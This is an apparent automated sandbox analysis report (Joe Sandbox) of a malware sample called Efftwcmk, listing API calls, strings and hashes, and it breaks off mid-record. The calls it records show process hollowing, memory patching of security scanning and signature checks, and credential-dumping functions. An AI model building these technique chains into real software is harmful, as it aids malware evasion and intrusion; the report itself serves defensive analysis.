                                                      • Instruction ID: 0cb1821235f907fdc858e22a42039b799181a344f5555d061c9795569d8793a0
                                                      • Opcode Fuzzy Hash: 3fbb129994c1663b6f1caf83ae9f36f495e206e7b3fe7c9186e1c89d126dae99
                                                      • Instruction Fuzzy Hash: E8F03AF0B513004FEB49DF7999913167BD6F789348F24867EE609DB398EBB186128B10
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                      • Instruction ID: 5e1bb5d9192a8e23301d267ed9b073714c5006d27567e5174eef30641d212028
                                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                      • Instruction Fuzzy Hash: E7F0E2706986125AD70E8F30CC58F3F76D99F80251F24CB2DF01AF50D0C734C9928601
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,02CB70C7,?,?,?,?,?), ref: 02CB7160
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002CB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB7000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2cb7000_Efftwcmk.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                      • Instruction ID: 4be21054298dd7febdf9193ff211915daee6a326a8af698cbef936a470d485c5
                                                      • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                      • Instruction Fuzzy Hash: 9CF081B36093179BAB118E55CC546B7F3A8AED1169F0A0428EC8AD7209E725E809C7B0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,2D2682CA,00000001,00000364,?,00000000,?,2D25BC87,00000000,?,?,2D25BD0B,00000000), ref: 2D265B34
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 237e3077146d9a095d9948ac42aa3ed64f9e498e9e176ef479d87971df47533a
                                                      • Instruction ID: 8569e77d4a1b61850bae8ad8ab7450e96338a5cd11d11cb8650750c275020fc9
                                                      • Opcode Fuzzy Hash: 237e3077146d9a095d9948ac42aa3ed64f9e498e9e176ef479d87971df47533a
                                                      • Instruction Fuzzy Hash: 81F0E9326D532966DB215A22CC44F6B775DFF616B0F118021EF04BA18CDF20E48086F4
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,2D2552BC,?,?,2D258847,?,?,00000000,2D296B50,?,2D22DE62,2D2552BC,?,?,?,?), ref: 2D266169
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 5b8ccf8ae3016b60a6ba03d907a1734bedd77beae8c216bf17976241afe15938
                                                      • Instruction ID: 4879c4c4807fbcd1690d669285ddbb8df49cc8a12fc6ccd1aacbf33fae6c0c15
                                                      • Opcode Fuzzy Hash: 5b8ccf8ae3016b60a6ba03d907a1734bedd77beae8c216bf17976241afe15938
                                                      • Instruction Fuzzy Hash: 75E0E5311C439676D71216654C08B5B3B6DEF816A2F2141E0DE04B23C2EE24D4C041F4
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C75832
                                                        • Part of subcall function 02C75A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C70000,02C9A790), ref: 02C75A94
                                                        • Part of subcall function 02C75A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AB2
                                                        • Part of subcall function 02C75A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AD0
                                                        • Part of subcall function 02C75A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75AEE
                                                        • Part of subcall function 02C75A78: RegQueryValueExA.ADVAPI32 ref: 02C75B37
                                                        • Part of subcall function 02C75A78: RegQueryValueExA.ADVAPI32 ref: 02C75B55
                                                        • Part of subcall function 02C75A78: RegCloseKey.ADVAPI32(?), ref: 02C75B77
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Open$FileModuleNameQueryValue$Close
                                                      • String ID:
                                                      • API String ID: 2796650324-0
                                                      • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                      • Instruction ID: 940d9bfaf485f2e7ed7b0d1d769de1334df273cd3fa633768ba28d70f42a813d
                                                      • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                      • Instruction Fuzzy Hash: EFE09271A403148FCB10DE6CC8C1B5637D8AF08790F440965EC68DF34AD3B0DA108BD0
                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(00000000,?,02C8E34C,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanString,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,UacInitialize), ref: 02C77E13
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                      • Instruction ID: 71e1c141d1eb6d59eb26f31a88b8353697c4fb479c4c3de8a8c28123af6a2bd5
                                                      • Opcode Fuzzy Hash: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                      • Instruction Fuzzy Hash: 8CC08CB1305A000E9A6475FC0CC441B428C09842383A41E71E079C62D2D331891B3810
                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(00000000,?,02C913E1,ScanString,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,ScanBuffer,02CAF358,02C974BC,ScanString), ref: 02C77E37
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                      • Instruction ID: 9743831294be8631037529d784970a833e49f86b0408052050aaa360b7511eb1
                                                      • Opcode Fuzzy Hash: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                      • Instruction Fuzzy Hash: 07C08CA03012080E9EA075FC1CC0A5A428D09842343A02A21F478D62C2D321883A3810
                                                      APIs
                                                      • timeSetEvent.WINMM(00002710,00000000,02C97F38,00000000,00000001), ref: 02C97F54
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Eventtime
                                                      • String ID:
                                                      • API String ID: 2982266575-0
                                                      • Opcode ID: fed93c41c8df8b6b99f9e80449738dff1f7c0438609be0705d48088fb61d5908
                                                      • Instruction ID: 21d76b22106b947f73ddc525081491e251d4ea6bf8a6c733589d8efca770dd2e
                                                      • Opcode Fuzzy Hash: fed93c41c8df8b6b99f9e80449738dff1f7c0438609be0705d48088fb61d5908
                                                      • Instruction Fuzzy Hash: 57C092F07E63003EFA209AA51CC6F23618DE315B01F200416B600EEAC1D5F748105E78
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02C716A4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: ce25d75decc1bf637182a7cb8c375e665af543d03cb9a077935793cecbb675ce
                                                      • Instruction ID: 24859a4c9e216222631d1d173df31b8378f8696f6aab575515fd69db5f878525
                                                      • Opcode Fuzzy Hash: ce25d75decc1bf637182a7cb8c375e665af543d03cb9a077935793cecbb675ce
                                                      • Instruction Fuzzy Hash: D9F0B4B2B407956BE7109F5A9C80792BB94FB40318F054639FA4CD7340D7B0A8108BD4
                                                      APIs
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C71704
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 07ed1bcebdec31e82d871409e4acad46d4fc5660bb7826e3cea76dd273b5e1a6
                                                      • Instruction ID: 601078bb71aa4e332ceb485a5507bd6d42b231e6c5a3613b30b5a01f6629923b
                                                      • Opcode Fuzzy Hash: 07ed1bcebdec31e82d871409e4acad46d4fc5660bb7826e3cea76dd273b5e1a6
                                                      • Instruction Fuzzy Hash: 0FE0C275300311AFE7205B7E5D84B12BBDDEB986A4F2C4476F609DB291D2F0E8109B60
                                                      APIs
                                                        • Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
                                                        • Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
                                                        • Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43
                                                      • CreateProcessAsUserW.ADVAPI32 ref: 02C8866E
                                                      • GetThreadContext.KERNEL32(00000000,02CAF400), ref: 02C88A07
                                                      • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02CAF4D4,00000004,02CAF4DC,ScanBuffer,02CAF384,02C89CD0,ScanString,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,UacScan,02CAF384), ref: 02C88C64
                                                      • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02CAF384,02C89CD0,ScanString,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,00000000,-00000008,02CAF4D4,00000004,02CAF4DC), ref: 02C88DDF
                                                        • Part of subcall function 02C87924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
                                                        • Part of subcall function 02C87924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
                                                        • Part of subcall function 02C87924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                      • API String ID: 3979268988-51457883
                                                      • Opcode ID: a31e268e113281531125b647dbcbecc4e5845581a0a3a2e09975be8f11822c79
                                                      • Instruction ID: 9885599cca0686f670a66334b532815b62dd78ade7341abbd23de9007850f8cc
                                                      • Opcode Fuzzy Hash: a31e268e113281531125b647dbcbecc4e5845581a0a3a2e09975be8f11822c79
                                                      • Instruction Fuzzy Hash: 30E2EC75B505689BDB25FB64CD80BDEB3BABF45304F1081A2E109AB324DB31AE45EF14
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C758D1
                                                      • GetProcAddress.KERNEL32(?,GetLongPathNameA,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C758E8
                                                      • lstrcpynA.KERNEL32(?,?,?), ref: 02C75918
                                                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C7597C
                                                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759B2
                                                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759C5
                                                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759D7
                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000,02C9A790), ref: 02C759E3
                                                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0,02C70000), ref: 02C75A17
                                                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C76BC0), ref: 02C75A23
                                                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C75A45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                      • String ID: GetLongPathNameA$\$kernel32.dll
                                                      • API String ID: 3245196872-1565342463
                                                      • Opcode ID: 0cb3a40b63a9c43a5ede207bf0bcadb8b99182190058717cc9fe5b58a4c318c1
                                                      • Instruction ID: 7c3012bfc8be27ae46d2d50e447dd2887e79486a482c4c05cf2d88ccb56d67cc
                                                      • Opcode Fuzzy Hash: 0cb3a40b63a9c43a5ede207bf0bcadb8b99182190058717cc9fe5b58a4c318c1
                                                      • Instruction Fuzzy Hash: 1C418F72D40258AFDB10DAE8CC88AEEB7BDEF483A0F4845A5E948E7241D7709B44DF50
                                                      APIs
                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75B94
                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75BA1
                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C75BA7
                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C75BD2
                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C19
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C29
                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C51
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C61
                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C75C87
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C75C97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                      • API String ID: 1599918012-2375825460
                                                      • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                      • Instruction ID: 4a6b3d20eda25259e785bf4f15ea7e8d849bb35511d20e44c254ff3a1f03eddc
                                                      • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                      • Instruction Fuzzy Hash: 483184B1E4061C2AFB25D6B8DC85FEF7BAD5B543C0F4801E19A08E6181DBB49F849F90
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384,02C89CD0,UacScan), ref: 02C87CBC
                                                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize,02CAF384), ref: 02C87CD6
                                                      • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,02CAF368,00000001,02CAF374,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0), ref: 02C87CFC
                                                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CAF384,02C8998C,ScanString,02CAF384,02C89CD0,ScanBuffer,02CAF384,02C89CD0,Initialize), ref: 02C87D12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                      • String ID: BCryptVerifySignature$bcrypt
                                                      • API String ID: 1002360270-4067648912
                                                      • Opcode ID: 9ba8bdff92b84a6c696fca9dcfadbdc393e943589ff78b2d2aae08fbd653325e
                                                      • Instruction ID: 256ea8f9bb11375f07d1e9101f8263b7de43e56cdb7f6d025ac8a994eff60e18
                                                      • Opcode Fuzzy Hash: 9ba8bdff92b84a6c696fca9dcfadbdc393e943589ff78b2d2aae08fbd653325e
                                                      • Instruction Fuzzy Hash: 54F0A471A82214AED350AA68AC44BAB77DCA78576DF104A2EB118C7540D7BA1815CB60
                                                      APIs
                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C8D086
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CheckConnectionInternet
                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                      • API String ID: 3847983778-3852638603
                                                      • Opcode ID: b88e2bc91ed39e20b69f5f7bc01802cdb811aa9d2339642323e80e57a249cb10
                                                      • Instruction ID: 989b2b1347401367d449e8d081c9fdc89b382c61ddfa606602e45fd73ad52995
                                                      • Opcode Fuzzy Hash: b88e2bc91ed39e20b69f5f7bc01802cdb811aa9d2339642323e80e57a249cb10
                                                      • Instruction Fuzzy Hash: EA411E75B501089BEB24FBA4D841A9EB7FAEF88314F218432E051A7290DB74AD06AF55
                                                      APIs
                                                        • Part of subcall function 02C74ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C74EDA
                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                      • String ID:
                                                      • API String ID: 3764614163-0
                                                      • Opcode ID: 5910ed9d1b8cd2dfbf4bfa6d433b5cedcfa36d8d4026bce9e77653a2c3b61de0
                                                      • Instruction ID: a0066262064d600bafb3a6f90ef15d142dc38bd3fcfb71069fb602a3e8037e32
                                                      • Opcode Fuzzy Hash: 5910ed9d1b8cd2dfbf4bfa6d433b5cedcfa36d8d4026bce9e77653a2c3b61de0
                                                      • Instruction Fuzzy Hash: BF21C071A40308BAEB24EAE4CC42FAEB7BDEB04B04F604472B600F71C0D7B46F049A65
                                                      APIs
                                                        • Part of subcall function 02C74ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C74EDA
                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C7A6), ref: 02C8C713
                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C8C74D
                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C8C77A
                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C8C783
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                      • String ID:
                                                      • API String ID: 3764614163-0
                                                      • Opcode ID: 18dd52e3cb2ec1b99b24ba98522245f632c1ccb0f6d0674bf0e8fefcdecaa981
                                                      • Instruction ID: e7081264859b6f39222a9305c41a990d34040754fe98f0028d7629750fa3a3c4
                                                      • Opcode Fuzzy Hash: 18dd52e3cb2ec1b99b24ba98522245f632c1ccb0f6d0674bf0e8fefcdecaa981
                                                      • Instruction Fuzzy Hash: AF21CD71A40308BAEB24EAE4CC42F9EB7BDEB04B04F604472B600F71C0D7B46B049A65
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 0-771429351
                                                      • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                      • Instruction ID: f99085d0a5bcfd01eb75ae565d7926c18a1c21d2c871593eff75e1d92953b079
                                                      • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                      • Instruction Fuzzy Hash: E3026D71E4021A9BDF14CFA9CC806ADB7F1FF88315F2582A9D919F7385D731AA418B90
                                                      APIs
                                                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C77F6D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1705453755-0
                                                      • Opcode ID: 143f9268a5e80dfaa54f38b765d793ec00e29daf0b12b5486355743ae4680b83
                                                      • Instruction ID: 585790d53f304870806eb8e447fe354259cd9efd62611c9eadcc093e3278fd49
                                                      • Opcode Fuzzy Hash: 143f9268a5e80dfaa54f38b765d793ec00e29daf0b12b5486355743ae4680b83
                                                      • Instruction Fuzzy Hash: 691116B5E00209AF9B04CF99C980DEFF7F9EFC8304B14C559A509EB254D6319A01CBA0
                                                      APIs
                                                        • Part of subcall function 02C86CE4: CLSIDFromProgID.OLE32(00000000), ref: 02C86D11
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,02C86E24,00000000), ref: 02C86D8F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFromInstanceProg
                                                      • String ID:
                                                      • API String ID: 2151042543-0
                                                      • Opcode ID: 1359a8cf082caa1c927c381a975360f45f3e91d876403bd46293ad05b77c709f
